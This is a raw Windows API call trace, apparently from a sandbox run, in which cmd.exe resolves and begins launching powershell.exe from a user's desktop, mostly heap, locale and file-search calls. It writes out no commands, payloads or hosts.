	[0027.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2df220 | out: lpFindFileData=0x2df220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xc07f0
	[0027.181] FindClose (in: hFindFile=0xc07f0 | out: hFindFile=0xc07f0) returned 1
	[0027.181] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2df220 | out: lpFindFileData=0x2df220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0xc07f0
	[0027.181] FindClose (in: hFindFile=0xc07f0 | out: hFindFile=0xc07f0) returned 1
	[0027.181] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0027.181] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", lpFindFileData=0x2df220 | out: lpFindFileData=0x2df220*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0xc07f0
	[0027.181] FindClose (in: hFindFile=0xc07f0 | out: hFindFile=0xc07f0) returned 1
	[0027.181] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
	[0027.181] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 1
	[0027.181] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\Desktop") returned 1
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd2850 | out: hHeap=0xc0000) returned 1
	[0027.182] GetEnvironmentStringsW () returned 0xd0550*
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x98e) returned 0xd1ef8
	[0027.182] FreeEnvironmentStringsW (penv=0xd0550) returned 1
	[0027.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd01b8 | out: hHeap=0xc0000) returned 1
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x400e) returned 0xd3b40
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x86) returned 0xd2890
	[0027.182] GetProcessHeap () returned 0xc0000
	[0027.182] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd3b40 | out: hHeap=0xc0000) returned 1
	[0027.182] GetConsoleOutputCP () returned 0x1b5
	[0027.183] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.183] GetUserDefaultLCID () returned 0x409
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a074950, cchData=8 | out: lpLCData=":") returned 2
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2df5e4, cchData=128 | out: lpLCData="0") returned 2
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2df5e4, cchData=128 | out: lpLCData="0") returned 2
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2df5e4, cchData=128 | out: lpLCData="1") returned 2
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a074940, cchData=8 | out: lpLCData="/") returned 2
	[0027.183] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a074d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a074d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a074d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a074cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a074c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a074c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a074c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a074930, cchData=8 | out: lpLCData=".") returned 2
	[0027.184] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a074920, cchData=8 | out: lpLCData=",") returned 2
	[0027.184] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0027.185] GetProcessHeap () returned 0xc0000
	[0027.185] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x20c) returned 0xd2920
	[0027.185] GetConsoleTitleW (in: lpConsoleTitle=0xd2920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.195] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.195] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0027.195] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0027.195] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0027.196] GetProcessHeap () returned 0xc0000
	[0027.196] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x400a) returned 0xd3b40
	[0027.196] GetProcessHeap () returned 0xc0000
	[0027.196] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd3b40 | out: hHeap=0xc0000) returned 1
	[0027.196] _wcsicmp (_String1="powershell", _String2=")") returned 71
	[0027.197] _wcsicmp (_String1="FOR", _String2="powershell") returned -10
	[0027.197] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10
	[0027.197] _wcsicmp (_String1="IF", _String2="powershell") returned -7
	[0027.197] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7
	[0027.197] _wcsicmp (_String1="REM", _String2="powershell") returned 2
	[0027.197] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2
	[0027.197] GetProcessHeap () returned 0xc0000
	[0027.197] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x58) returned 0xd2b38
	[0027.197] GetProcessHeap () returned 0xc0000
	[0027.197] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x1e) returned 0xce9c0
	[0027.198] GetProcessHeap () returned 0xc0000
	[0027.198] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x6e) returned 0xd2b98
	[0027.199] GetConsoleTitleW (in: lpConsoleTitle=0x2df2dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.199] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0027.199] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0027.199] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0027.199] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0027.199] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0027.199] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0027.199] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0027.199] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0027.200] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0027.200] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0027.200] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0027.200] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0027.200] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0027.200] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0027.200] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0027.200] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0027.200] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0027.200] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0027.200] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0027.200] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0027.200] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0027.200] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0027.200] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0027.200] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0027.200] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0027.200] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0027.200] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0027.200] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0027.200] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0027.200] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0027.200] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0027.200] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0027.200] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0027.200] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0027.200] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0027.200] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0027.200] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0027.200] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0027.200] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0027.200] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0027.200] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0027.201] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0027.201] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0027.201] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0027.201] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0027.201] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0027.201] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0027.201] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0027.201] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0027.201] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0027.201] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0027.201] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0027.201] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0027.201] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0027.201] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0027.201] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0027.201] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0027.201] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0027.201] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0027.201] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0027.201] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0027.201] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0027.201] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0027.201] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0027.201] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0027.201] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0027.202] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0027.202] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0027.202] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0027.202] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0027.202] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0027.202] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0027.202] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0027.202] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0027.202] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0027.202] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0027.202] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0027.202] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0027.202] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0027.202] _wcsicmp (_String1="powershell", _String2="FOR") returned 10
	[0027.202] _wcsicmp (_String1="powershell", _String2="IF") returned 7
	[0027.202] _wcsicmp (_String1="powershell", _String2="REM") returned -2
	[0027.202] GetProcessHeap () returned 0xc0000
	[0027.202] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x210) returned 0xd2c10
	[0027.203] GetProcessHeap () returned 0xc0000
	[0027.203] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x84) returned 0xd2e28
	[0027.203] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13
	[0027.203] GetProcessHeap () returned 0xc0000
	[0027.203] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x418) returned 0xc07f0
	[0027.203] SetErrorMode (uMode=0x0) returned 0x0
	[0027.203] SetErrorMode (uMode=0x1) returned 0x0
	[0027.203] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc07f8, lpFilePart=0x2dedfc | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2dedfc*="Desktop") returned 0x1d
	[0027.203] SetErrorMode (uMode=0x0) returned 0x1
	[0027.203] GetProcessHeap () returned 0xc0000
	[0027.203] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xc07f0, Size=0x5a) returned 0xc07f0
	[0027.203] GetProcessHeap () returned 0xc0000
	[0027.203] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xc07f0) returned 0x5a
	[0027.203] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.203] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0027.204] GetProcessHeap () returned 0xc0000
	[0027.204] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x158) returned 0xd2eb8
	[0027.204] GetProcessHeap () returned 0xc0000
	[0027.204] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x2a8) returned 0xc0858
	[0027.210] GetProcessHeap () returned 0xc0000
	[0027.210] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xc0858, Size=0x15a) returned 0xc0858
	[0027.210] GetProcessHeap () returned 0xc0000
	[0027.210] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xc0858) returned 0x15a
	[0027.210] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.210] GetProcessHeap () returned 0xc0000
	[0027.210] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe0) returned 0xd3018
	[0027.210] GetProcessHeap () returned 0xc0000
	[0027.210] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd3018, Size=0x76) returned 0xd3018
	[0027.210] GetProcessHeap () returned 0xc0000
	[0027.210] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd3018) returned 0x76
	[0027.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.212] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.212] GetLastError () returned 0x2
	[0027.212] FindFirstFileExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.212] GetLastError () returned 0x2
	[0027.212] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.212] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.217] GetLastError () returned 0x2
	[0027.217] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.217] GetLastError () returned 0x2
	[0027.217] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.217] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.217] GetLastError () returned 0x2
	[0027.217] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.217] GetLastError () returned 0x2
	[0027.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.218] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.218] GetLastError () returned 0x2
	[0027.218] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.218] GetLastError () returned 0x2
	[0027.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.218] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.218] GetLastError () returned 0x2
	[0027.218] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.219] GetLastError () returned 0x2
	[0027.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0027.219] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xd3098
	[0027.219] GetProcessHeap () returned 0xc0000
	[0027.219] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x14) returned 0xcfc28
	[0027.219] FindClose (in: hFindFile=0xd3098 | out: hFindFile=0xd3098) returned 1
	[0027.219] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xffffffff
	[0027.219] GetLastError () returned 0x2
	[0027.219] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x2deb78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2deb78) returned 0xd3098
	[0027.219] GetProcessHeap () returned 0xc0000
	[0027.219] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xcfc28, Size=0x4) returned 0xcfc28
	[0027.219] FindClose (in: hFindFile=0xd3098 | out: hFindFile=0xd3098) returned 1
	[0027.220] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0027.220] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0027.220] GetConsoleTitleW (in: lpConsoleTitle=0x2df070, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.220] InitializeProcThreadAttributeList (in: lpAttributeList=0x2deef8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2defc0 | out: lpAttributeList=0x2deef8, lpSize=0x2defc0) returned 1
	[0027.220] UpdateProcThreadAttribute (in: lpAttributeList=0x2deef8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2defb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2deef8, lpPreviousValue=0x0) returned 1
	[0027.220] GetStartupInfoW (in: lpStartupInfo=0x2deeb4 | out: lpStartupInfo=0x2deeb4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0027.220] GetProcessHeap () returned 0xc0000
	[0027.220] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x18) returned 0xd3098
	[0027.220] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0027.220] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0027.220] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.221] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.221] GetProcessHeap () returned 0xc0000
	[0027.221] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd3098 | out: hHeap=0xc0000) returned 1
	[0027.222] GetProcessHeap () returned 0xc0000
	[0027.222] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xa) returned 0xcd658
	[0027.222] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
